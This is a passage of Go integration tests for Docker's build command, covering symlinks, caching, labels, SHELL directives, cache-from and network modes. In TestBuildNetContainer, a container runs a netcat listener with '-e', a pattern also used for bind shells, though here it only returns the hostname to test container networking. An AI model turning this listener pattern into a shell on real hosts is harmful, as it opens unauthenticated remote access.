invalidate cache + err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644) + c.Assert(err, checker.IsNil) + + id, out, err = buildImageFromContextWithOut(name, ctx, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), "Using cache") + + out, _ = dockerCmd(c, "run", "--rm", id, "cat", "target") + c.Assert(out, checker.Matches, "baz") +} + +func (s *DockerSuite) TestBuildFollowSymlinkToDir(c *check.C) { + name := "testbuildbrokensymlink" + ctx, err := fakeContext(` + FROM busybox + COPY asymlink /`, + map[string]string{ + "foo/abc": "bar", + "foo/def": "baz", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + c.Assert(err, checker.IsNil) + + id, err := buildImageFromContext(name, ctx, true) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "run", "--rm", id, "cat", "abc", "def") + c.Assert(out, checker.Matches, "barbaz") + + // change target file should invalidate cache + err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo/def"), []byte("bax"), 0644) + c.Assert(err, checker.IsNil) + + id, out, err = buildImageFromContextWithOut(name, ctx, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), "Using cache") + + out, _ = dockerCmd(c, "run", "--rm", id, "cat", "abc", "def") + c.Assert(out, checker.Matches, "barbax") + +} + +// TestBuildSymlinkBasename tests that target file gets basename from symlink, +// not from the target file. +func (s *DockerSuite) TestBuildSymlinkBasename(c *check.C) { + name := "testbuildbrokensymlink" + ctx, err := fakeContext(` + FROM busybox + COPY asymlink /`, + map[string]string{ + "foo": "bar", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + c.Assert(err, checker.IsNil) + + id, err := buildImageFromContext(name, ctx, true) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "run", "--rm", id, "cat", "asymlink") + c.Assert(out, checker.Matches, "bar") + +} + +// #17827 +func (s *DockerSuite) TestBuildCacheRootSource(c *check.C) { + name := "testbuildrootsource" + ctx, err := fakeContext(` + FROM busybox + COPY / /data`, + map[string]string{ + "foo": "bar", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + // warm up cache + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, checker.IsNil) + + // change file, should invalidate cache + err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644) + c.Assert(err, checker.IsNil) + + _, out, err := buildImageFromContextWithOut(name, ctx, true) + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Not(checker.Contains), "Using cache") +} + +// #19375 +func (s *DockerSuite) TestBuildFailsGitNotCallable(c *check.C) { + cmd := exec.Command(dockerBinary, "build", "github.com/docker/v1.10-migrator.git") + cmd.Env = append(cmd.Env, "PATH=") + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ") + + cmd = exec.Command(dockerBinary, "build", "https://github.com/docker/v1.10-migrator.git") + cmd.Env = append(cmd.Env, "PATH=") + out, _, err = runCommandWithOutput(cmd) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ") +} + +// TestBuildWorkdirWindowsPath tests that a Windows style path works as a workdir +func (s *DockerSuite) TestBuildWorkdirWindowsPath(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildworkdirwindowspath" + + _, err := buildImage(name, ` + FROM `+WindowsBaseImage+` + RUN mkdir C:\\work + WORKDIR C:\\work + RUN if "%CD%" NEQ "C:\work" exit -1 + `, true) + + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildLabel(c *check.C) { + name := "testbuildlabel" + testLabel := "foo" + + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + LABEL default foo +`, false, "--label", testLabel) + + c.Assert(err, checker.IsNil) + + res := inspectFieldJSON(c, name, "Config.Labels") + + var labels map[string]string + + if err := json.Unmarshal([]byte(res), &labels); err != nil { + c.Fatal(err) + } + + if _, ok := labels[testLabel]; !ok { + c.Fatal("label not found in image") + } +} + +func (s *DockerSuite) TestBuildLabelOneNode(c *check.C) { + name := "testbuildlabel" + + _, err := buildImage(name, "FROM busybox", false, "--label", "foo=bar") + + c.Assert(err, checker.IsNil) + + res, err := inspectImage(name, "json .Config.Labels") + c.Assert(err, checker.IsNil) + var labels map[string]string + + if err := json.Unmarshal([]byte(res), &labels); err != nil { + c.Fatal(err) + } + + v, ok := labels["foo"] + if !ok { + c.Fatal("label `foo` not found in image") + } + c.Assert(v, checker.Equals, "bar") +} + +func (s *DockerSuite) TestBuildLabelCacheCommit(c *check.C) { + name := "testbuildlabelcachecommit" + testLabel := "foo" + + if _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + LABEL default foo + `, false); err != nil { + c.Fatal(err) + } + + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + LABEL default foo +`, true, "--label", testLabel) + + c.Assert(err, checker.IsNil) + + res := inspectFieldJSON(c, name, "Config.Labels") + + var labels map[string]string + + if err := json.Unmarshal([]byte(res), &labels); err != nil { + c.Fatal(err) + } + + if _, ok := labels[testLabel]; !ok { + c.Fatal("label not found in image") + } +} + +func (s *DockerSuite) TestBuildLabelMultiple(c *check.C) { + name := "testbuildlabelmultiple" + testLabels := map[string]string{ + "foo": "bar", + "123": "456", + } + + labelArgs := []string{} + + for k, v := range testLabels { + labelArgs = append(labelArgs, "--label", k+"="+v) + } + + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + LABEL default foo +`, false, labelArgs...) + + if err != nil { + c.Fatal("error building image with labels", err) + } + + res := inspectFieldJSON(c, name, "Config.Labels") + + var labels map[string]string + + if err := json.Unmarshal([]byte(res), &labels); err != nil { + c.Fatal(err) + } + + for k, v := range testLabels { + if x, ok := labels[k]; !ok || x != v { + c.Fatalf("label %s=%s not found in image", k, v) + } + } +} + +func (s *DockerSuite) TestBuildLabelOverwrite(c *check.C) { + name := "testbuildlabeloverwrite" + testLabel := "foo" + testValue := "bar" + + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + LABEL `+testLabel+`+ foo +`, false, []string{"--label", testLabel + "=" + testValue}...) + + if err != nil { + c.Fatal("error building image with labels", err) + } + + res := inspectFieldJSON(c, name, "Config.Labels") + + var labels map[string]string + + if err := json.Unmarshal([]byte(res), &labels); err != nil { + c.Fatal(err) + } + + v, ok := labels[testLabel] + if !ok { + c.Fatal("label not found in image") + } + + if v != testValue { + c.Fatal("label not overwritten") + } +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestBuildFromAuthenticatedRegistry(c *check.C) { + dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + baseImage := privateRegistryURL + "/baseimage" + + _, err := buildImage(baseImage, ` + FROM busybox + ENV env1 val1 + `, true) + + c.Assert(err, checker.IsNil) + + dockerCmd(c, "push", baseImage) + dockerCmd(c, "rmi", baseImage) + + _, err = buildImage(baseImage, fmt.Sprintf(` + FROM %s + ENV env2 val2 + `, baseImage), true) + + c.Assert(err, checker.IsNil) +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C) { + osPath := os.Getenv("PATH") + defer os.Setenv("PATH", osPath) + + workingDir, err := os.Getwd() + c.Assert(err, checker.IsNil) + absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth")) + c.Assert(err, checker.IsNil) + testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute) + + os.Setenv("PATH", testPath) + + repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL) + + tmp, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + + externalAuthConfig := `{ "credsStore": "shell-test" }` + + configPath := filepath.Join(tmp, "config.json") + err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + b, err := ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":") + + dockerCmd(c, "--config", tmp, "tag", "busybox", repoName) + dockerCmd(c, "--config", tmp, "push", repoName) + + // make sure the image is pulled when building + dockerCmd(c, "rmi", repoName) + + buildCmd := exec.Command(dockerBinary, "--config", tmp, "build", "-") + buildCmd.Stdin = strings.NewReader(fmt.Sprintf("FROM %s", repoName)) + + out, _, err := runCommandWithOutput(buildCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +// Test cases in #22036 +func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { + // Command line option labels will always override + name := "scratchy" + expected := `{"bar":"from-flag","foo":"from-flag"}` + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + LABEL foo=from-dockerfile`, + true, "--label", "foo=from-flag", "--label", "bar=from-flag") + c.Assert(err, check.IsNil) + + res := inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + name = "from" + expected = `{"foo":"from-dockerfile"}` + _, err = buildImage(name, + `FROM `+minimalBaseImage()+` + LABEL foo from-dockerfile`, + true) + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + // Command line option label will override even via `FROM` + name = "new" + expected = `{"bar":"from-dockerfile2","foo":"new"}` + _, err = buildImage(name, + `FROM from + LABEL bar from-dockerfile2`, + true, "--label", "foo=new") + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + // Command line option without a value set (--label foo, --label bar=) + // will be treated as --label foo="", --label bar="" + name = "scratchy2" + expected = `{"bar":"","foo":""}` + _, err = buildImage(name, + `FROM `+minimalBaseImage()+` + LABEL foo=from-dockerfile`, + true, "--label", "foo", "--label", "bar=") + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + // Command line option without a value set (--label foo, --label bar=) + // will be treated as --label foo="", --label bar="" + // This time is for inherited images + name = "new2" + expected = `{"bar":"","foo":""}` + _, err = buildImage(name, + `FROM from + LABEL bar from-dockerfile2`, + true, "--label", "foo=", "--label", "bar") + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + // Command line option labels with only `FROM` + name = "scratchy" + expected = `{"bar":"from-flag","foo":"from-flag"}` + _, err = buildImage(name, + `FROM `+minimalBaseImage(), + true, "--label", "foo=from-flag", "--label", "bar=from-flag") + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + // Command line option labels with env var + name = "scratchz" + expected = `{"bar":"$PATH"}` + _, err = buildImage(name, + `FROM `+minimalBaseImage(), + true, "--label", "bar=$PATH") + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + +} + +// Test case for #22855 +func (s *DockerSuite) TestBuildDeleteCommittedFile(c *check.C) { + name := "test-delete-committed-file" + + _, err := buildImage(name, + `FROM busybox + RUN echo test > file + RUN test -e file + RUN rm file + RUN sh -c "! test -e file"`, false) + if err != nil { + c.Fatal(err) + } +} + +// #20083 +func (s *DockerSuite) TestBuildDockerignoreComment(c *check.C) { + // TODO Windows: Figure out why this test is flakey on TP5. If you add + // something like RUN sleep 5, or even RUN ls /tmp after the ADD line, + // it is more reliable, but that's not a good fix. + testRequires(c, DaemonIsLinux) + + name := "testbuilddockerignorecleanpaths" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN sh -c "(ls -la /tmp/#1)" + RUN sh -c "(! ls -la /tmp/#2)" + RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (ls /tmp/dir1/foo)"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "foo", + "foo2": "foo2", + "dir1/foo": "foo in dir1", + "#1": "# file 1", + "#2": "# file 2", + ".dockerignore": `# Visual C++ cache files +# because we have git ;-) +# The above comment is from #20083 +foo +#dir1/foo +foo2 +# The following is considered as comment as # is at the beginning +#1 +# The following is not considered as comment as # is not at the beginning + #2 +`, + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Test case for #23221 +func (s *DockerSuite) TestBuildWithUTF8BOM(c *check.C) { + name := "test-with-utf8-bom" + dockerfile := []byte(`FROM busybox`) + bomDockerfile := append([]byte{0xEF, 0xBB, 0xBF}, dockerfile...) + ctx, err := fakeContextFromNewTempDir() + c.Assert(err, check.IsNil) + defer ctx.Close() + err = ctx.addFile("Dockerfile", bomDockerfile) + c.Assert(err, check.IsNil) + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, check.IsNil) +} + +// Test case for UTF-8 BOM in .dockerignore, related to #23221 +func (s *DockerSuite) TestBuildWithUTF8BOMDockerignore(c *check.C) { + name := "test-with-utf8-bom-dockerignore" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN ls -la /tmp + RUN sh -c "! ls /tmp/Dockerfile" + RUN ls /tmp/.dockerignore` + dockerignore := []byte("./Dockerfile\n") + bomDockerignore := append([]byte{0xEF, 0xBB, 0xBF}, dockerignore...) + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": dockerfile, + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + err = ctx.addFile(".dockerignore", bomDockerignore) + c.Assert(err, check.IsNil) + _, err = buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } +} + +// #22489 Shell test to confirm config gets updated correctly +func (s *DockerSuite) TestBuildShellUpdatesConfig(c *check.C) { + name := "testbuildshellupdatesconfig" + + expected := `["foo","-bar","#(nop) ","SHELL [foo -bar]"]` + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + SHELL ["foo", "-bar"]`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "ContainerConfig.Cmd") + if res != expected { + c.Fatalf("%s, expected %s", res, expected) + } + res = inspectFieldJSON(c, name, "ContainerConfig.Shell") + if res != `["foo","-bar"]` { + c.Fatalf(`%s, expected ["foo","-bar"]`, res) + } +} + +// #22489 Changing the shell multiple times and CMD after. +func (s *DockerSuite) TestBuildShellMultiple(c *check.C) { + name := "testbuildshellmultiple" + + _, out, _, err := buildImageWithStdoutStderr(name, + `FROM busybox + RUN echo defaultshell + SHELL ["echo"] + RUN echoshell + SHELL ["ls"] + RUN -l + CMD -l`, + true) + if err != nil { + c.Fatal(err) + } + + // Must contain 'defaultshell' twice + if len(strings.Split(out, "defaultshell")) != 3 { + c.Fatalf("defaultshell should have appeared twice in %s", out) + } + + // Must contain 'echoshell' twice + if len(strings.Split(out, "echoshell")) != 3 { + c.Fatalf("echoshell should have appeared twice in %s", out) + } + + // Must contain "total " (part of ls -l) + if !strings.Contains(out, "total ") { + c.Fatalf("%s should have contained 'total '", out) + } + + // A container started from the image uses the shell-form CMD. + // Last shell is ls. CMD is -l. So should contain 'total '. + outrun, _ := dockerCmd(c, "run", "--rm", name) + if !strings.Contains(outrun, "total ") { + c.Fatalf("Expected started container to run ls -l. %s", outrun) + } +} + +// #22489. Changed SHELL with ENTRYPOINT +func (s *DockerSuite) TestBuildShellEntrypoint(c *check.C) { + name := "testbuildshellentrypoint" + + _, err := buildImage(name, + `FROM busybox + SHELL ["ls"] + ENTRYPOINT -l`, + true) + if err != nil { + c.Fatal(err) + } + + // A container started from the image uses the shell-form ENTRYPOINT. + // Shell is ls. ENTRYPOINT is -l. So should contain 'total '. + outrun, _ := dockerCmd(c, "run", "--rm", name) + if !strings.Contains(outrun, "total ") { + c.Fatalf("Expected started container to run ls -l. %s", outrun) + } +} + +// #22489 Shell test to confirm shell is inherited in a subsequent build +func (s *DockerSuite) TestBuildShellInherited(c *check.C) { + name1 := "testbuildshellinherited1" + _, err := buildImage(name1, + `FROM busybox + SHELL ["ls"]`, + true) + if err != nil { + c.Fatal(err) + } + + name2 := "testbuildshellinherited2" + _, out, _, err := buildImageWithStdoutStderr(name2, + `FROM `+name1+` + RUN -l`, + true) + if err != nil { + c.Fatal(err) + } + + // ls -l has "total " followed by some number in it, ls without -l does not. + if !strings.Contains(out, "total ") { + c.Fatalf("Should have seen total in 'ls -l'.\n%s", out) + } +} + +// #22489 Shell test to confirm non-JSON doesn't work +func (s *DockerSuite) TestBuildShellNotJSON(c *check.C) { + name := "testbuildshellnotjson" + + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + sHeLl exec -form`, // Casing explicit to ensure error is upper-cased. + true) + if err == nil { + c.Fatal("Image build should have failed") + } + if !strings.Contains(err.Error(), "SHELL requires the arguments to be in JSON form") { + c.Fatal("Error didn't indicate that arguments must be in JSON form") + } +} + +// #22489 Windows shell test to confirm native is powershell if executing a PS command +// This would error if the default shell were still cmd. +func (s *DockerSuite) TestBuildShellWindowsPowershell(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildshellpowershell" + _, out, err := buildImageWithOut(name, + `FROM `+minimalBaseImage()+` + SHELL ["powershell", "-command"] + RUN Write-Host John`, + true) + if err != nil { + c.Fatal(err) + } + if !strings.Contains(out, "\nJohn\n") { + c.Fatalf("Line with 'John' not found in output %q", out) + } +} + +// Verify that escape is being correctly applied to words when escape directive is not \. +// Tests WORKDIR, ADD +func (s *DockerSuite) TestBuildEscapeNotBackslashWordTest(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildescapenotbackslashwordtesta" + _, out, err := buildImageWithOut(name, + `# escape= `+"`"+` + FROM `+minimalBaseImage()+` + WORKDIR c:\windows + RUN dir /w`, + true) + if err != nil { + c.Fatal(err) + } + if !strings.Contains(strings.ToLower(out), "[system32]") { + c.Fatalf("Line with '[windows]' not found in output %q", out) + } + + name = "testbuildescapenotbackslashwordtestb" + _, out, err = buildImageWithOut(name, + `# escape= `+"`"+` + FROM `+minimalBaseImage()+` + SHELL ["powershell.exe"] + WORKDIR c:\foo + ADD Dockerfile c:\foo\ + RUN dir Dockerfile`, + true) + if err != nil { + c.Fatal(err) + } + if !strings.Contains(strings.ToLower(out), "-a----") { + c.Fatalf("Line with '-a----' not found in output %q", out) + } + +} + +// #22868. Make sure shell-form CMD is marked as escaped in the config of the image +func (s *DockerSuite) TestBuildCmdShellArgsEscaped(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildcmdshellescaped" + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + CMD "ipconfig" + `, true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.ArgsEscaped") + if res != "true" { + c.Fatalf("CMD did not update Config.ArgsEscaped on image: %v", res) + } + dockerCmd(c, "run", "--name", "inspectme", name) + dockerCmd(c, "wait", "inspectme") + res = inspectFieldJSON(c, name, "Config.Cmd") + + if res != `["cmd","/S","/C","\"ipconfig\""]` { + c.Fatalf("CMD was not escaped Config.Cmd: got %v", res) + } +} + +// Test case for #24912. +func (s *DockerSuite) TestBuildStepsWithProgress(c *check.C) { + name := "testbuildstepswithprogress" + + totalRun := 5 + _, out, err := buildImageWithOut(name, "FROM busybox\n"+strings.Repeat("RUN echo foo\n", totalRun), true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Step 1/%d : FROM busybox", 1+totalRun)) + for i := 2; i <= 1+totalRun; i++ { + c.Assert(out, checker.Contains, fmt.Sprintf("Step %d/%d : RUN echo foo", i, 1+totalRun)) + } +} + +func (s *DockerSuite) TestBuildWithFailure(c *check.C) { + name := "testbuildwithfailure" + + // First test case can only detect `nobody` in runtime so all steps will show up + buildCmd := "FROM busybox\nRUN nobody" + _, stdout, _, err := buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm") + c.Assert(err, checker.NotNil) + c.Assert(stdout, checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(stdout, checker.Contains, "Step 2/2 : RUN nobody") + + // Second test case `FFOM` should have been detected before build runs so no steps + buildCmd = "FFOM nobody\nRUN nobody" + _, stdout, _, err = buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm") + c.Assert(err, checker.NotNil) + c.Assert(stdout, checker.Not(checker.Contains), "Step 1/2 : FROM busybox") + c.Assert(stdout, checker.Not(checker.Contains), "Step 2/2 : RUN nobody") +} + +func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { + testRequires(c, DaemonIsLinux) // All tests that do save are skipped in windows + dockerfile := ` + FROM busybox + ENV FOO=bar + ADD baz / + RUN touch bax` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": dockerfile, + "baz": "baz", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + id1, err := buildImageFromContext("build1", ctx, true) + c.Assert(err, checker.IsNil) + + // rebuild with cache-from + id2, out, err := buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") + c.Assert(err, checker.IsNil) + c.Assert(id1, checker.Equals, id2) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) + dockerCmd(c, "rmi", "build2") + + // no cache match with unknown source + id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=nosuchtag") + c.Assert(err, checker.IsNil) + c.Assert(id1, checker.Not(checker.Equals), id2) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 0) + dockerCmd(c, "rmi", "build2") + + // clear parent images + tempDir, err := ioutil.TempDir("", "test-build-cache-from-") + if err != nil { + c.Fatalf("failed to create temporary directory: %s", tempDir) + } + defer os.RemoveAll(tempDir) + tempFile := filepath.Join(tempDir, "img.tar") + dockerCmd(c, "save", "-o", tempFile, "build1") + dockerCmd(c, "rmi", "build1") + dockerCmd(c, "load", "-i", tempFile) + parentID, _ := dockerCmd(c, "inspect", "-f", "{{.Parent}}", "build1") + c.Assert(strings.TrimSpace(parentID), checker.Equals, "") + + // cache still applies without parents + id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") + c.Assert(err, checker.IsNil) + c.Assert(id1, checker.Equals, id2) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) + history1, _ := dockerCmd(c, "history", "-q", "build2") + + // Retry, no new intermediate images + id3, out, err := buildImageFromContextWithOut("build3", ctx, true, "--cache-from=build1") + c.Assert(err, checker.IsNil) + c.Assert(id1, checker.Equals, id3) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) + history2, _ := dockerCmd(c, "history", "-q", "build3") + + c.Assert(history1, checker.Equals, history2) + dockerCmd(c, "rmi", "build2") + dockerCmd(c, "rmi", "build3") + dockerCmd(c, "rmi", "build1") + dockerCmd(c, "load", "-i", tempFile) + + // Modify file, everything up to last command and layers are reused + dockerfile = ` + FROM busybox + ENV FOO=bar + ADD baz / + RUN touch newfile` + err = ioutil.WriteFile(filepath.Join(ctx.Dir, "Dockerfile"), []byte(dockerfile), 0644) + c.Assert(err, checker.IsNil) + + id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") + c.Assert(err, checker.IsNil) + c.Assert(id1, checker.Not(checker.Equals), id2) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 2) + + layers1Str, _ := dockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build1") + layers2Str, _ := dockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build2") + + var layers1 []string + var layers2 []string + c.Assert(json.Unmarshal([]byte(layers1Str), &layers1), checker.IsNil) + c.Assert(json.Unmarshal([]byte(layers2Str), &layers2), checker.IsNil) + + c.Assert(len(layers1), checker.Equals, len(layers2)) + for i := 0; i < len(layers1)-1; i++ { + c.Assert(layers1[i], checker.Equals, layers2[i]) + } + c.Assert(layers1[len(layers1)-1], checker.Not(checker.Equals), layers2[len(layers1)-1]) +} + +func (s *DockerSuite) TestBuildNetNone(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "testbuildnetnone" + _, out, err := buildImageWithOut(name, ` + FROM busybox + RUN ping -c 1 8.8.8.8 + `, true, "--network=none") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "unreachable") +} + +func (s *DockerSuite) TestBuildNetContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + + id, _ := dockerCmd(c, "run", "--hostname", "foobar", "-d", "busybox", "nc", "-ll", "-p", "1234", "-e", "hostname") + + name := "testbuildnetcontainer" + out, err := buildImage(name, ` + FROM busybox + RUN nc localhost 1234 > /otherhost + `, true, "--network=container:"+strings.TrimSpace(id)) + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + host, _ := dockerCmd(c, "run", "testbuildnetcontainer", "cat", "/otherhost") + c.Assert(strings.TrimSpace(host), check.Equals, "foobar") +} + +func (s *DockerSuite) TestBuildSquashParent(c *check.C) { + testRequires(c, ExperimentalDaemon) + dockerFile := ` + FROM busybox + RUN echo hello > /hello + RUN echo world >> /hello + RUN echo hello > /remove_me + ENV HELLO world + RUN rm /remove_me + ` + // build and get the ID that we can use later for history comparison + origID, err := buildImage("test", dockerFile, false) + c.Assert(err, checker.IsNil) + + // build with squash + id, err := buildImage("test", dockerFile, true, "--squash") + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "cat /hello") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello\nworld") + + dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "[ ! -f /remove_me ]") + dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", `[ "$(echo $HELLO)" == "world" ]`) + + // make sure the ID produced is the ID of the tag we specified + inspectID, err := inspectImage("test", ".ID") + c.Assert(err, checker.IsNil) + c.Assert(inspectID, checker.Equals, id) + + origHistory, _ := dockerCmd(c, "history", origID) + testHistory, _ := dockerCmd(c, "history", "test") + + splitOrigHistory := strings.Split(strings.TrimSpace(origHistory), "\n") + splitTestHistory := strings.Split(strings.TrimSpace(testHistory), "\n") + c.Assert(len(splitTestHistory), checker.Equals, len(splitOrigHistory)+1) + + out, err = inspectImage(id, "len .RootFS.Layers") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "3") +} + +func (s *DockerSuite) TestBuildContChar(c *check.C) { + name := "testbuildcontchar" + + _, out, err := buildImageWithOut(name, + `FROM busybox\`, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Step 1/1 : FROM busybox") + + _, out, err = buildImageWithOut(name, + `FROM busybox + RUN echo hi \`, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi\n") + + _, out, err = buildImageWithOut(name, + `FROM busybox + RUN echo hi \\`, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\n") + + _, out, err = buildImageWithOut(name, + `FROM busybox + RUN echo hi \\\`, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\\\n") +} + +// TestBuildOpaqueDirectory tests that a build succeeds which +// creates opaque directories. +// See https://github.com/docker/docker/issues/25244 +func (s *DockerSuite) TestBuildOpaqueDirectory(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerFile := ` + FROM busybox + RUN mkdir /dir1 && touch /dir1/f1 + RUN rm -rf /dir1 && mkdir /dir1 && touch /dir1/f2 + RUN touch /dir1/f3 + RUN [ -f /dir1/f2 ] + ` + + // Test that build succeeds, last command fails if opaque directory + // was not handled correctly + _, err := buildImage("testopaquedirectory", dockerFile, false) + c.Assert(err, checker.IsNil) +} + +// Windows test for USER in dockerfile +func (s *DockerSuite) TestBuildWindowsUser(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildwindowsuser" + _, out, err := buildImageWithOut(name, + `FROM `+WindowsBaseImage+` + RUN net user user /add + USER user + RUN set username + `, + true) + if err != nil { + c.Fatal(err) + } + c.Assert(strings.ToLower(out), checker.Contains, "username=user") +} + +// Verifies if COPY file . when WORKDIR is set to a non-existing directory, +// the directory is created and the file is copied into the directory, +// as opposed to the file being copied as a file with the name of the +// directory. Fix for 27545 (found on Windows, but regression good for Linux too). +// Note 27545 was reverted in 28505, but a new fix was added subsequently in 28514. +func (s *DockerSuite) TestBuildCopyFileDotWithWorkdir(c *check.C) { + name := "testbuildcopyfiledotwithworkdir" + ctx, err := fakeContext(`FROM busybox +WORKDIR /foo +COPY file . +RUN ["cat", "/foo/file"] +`, + map[string]string{}) + + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if err := ctx.Add("file", "content"); err != nil { + c.Fatal(err) + } + + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Case-insensitive environment variables on Windows +func (s *DockerSuite) TestBuildWindowsEnvCaseInsensitive(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildwindowsenvcaseinsensitive" + if _, err := buildImage(name, ` + FROM `+WindowsBaseImage+` + ENV FOO=bar foo=bar + `, true); err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.Env") + if res != `["foo=bar"]` { // Should not have 